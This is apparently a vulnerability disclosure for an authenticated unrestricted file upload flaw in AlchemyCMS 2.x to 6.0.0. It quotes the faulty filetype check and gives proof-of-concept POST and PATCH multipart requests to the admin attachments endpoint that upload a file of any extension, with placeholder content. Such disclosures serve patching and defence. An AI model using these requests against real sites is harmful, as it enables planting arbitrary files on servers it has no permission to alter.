Authored by Abdulrahman

Alchemy CMS versions 2.x through 6.0.0 suffers from an arbitrary file upload vulnerability.

# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://alchemy-cms.com
# Software Link: https://github.com/AlchemyCMS/alchemy_cms
# Version: from 2.0 to 6.0.0
# Tested on: Linux ruby 2.6.8p205 rails 6

in /app/models/alchemy/attachment.rb line 82 :

      def allowed_filetypes
        Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
      end
    end

in /app/views/alchemy/admin/uploader/_button.html.erb in 18

  configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>



    POC :
    POST /admin/attachments HTTP/1.1
        ------WebKitFormBoundarydAup7dA7ub3Weccp
         Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
         Content-Type: application/octet-stream

         anything

          ------WebKitFormBoundarydAup7dA7ub3Weccp--


OR
         id = 8 for old attachment

        PATCH /admin/attachments/8 HTTP/1.1
------WebKitFormBoundarylYnqNR9sxMPdw7Si
        Content-Disposition: form-data; name="_method"

        patch
        ------WebKitFormBoundarylYnqNR9sxMPdw7Si
        Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
        Content-Type: application/octet-stream

            anything
        ------WebKitFormBoundarylYnqNR9sxMPdw7Si--

RELATED ARTICLESMORE FROM AUTHOR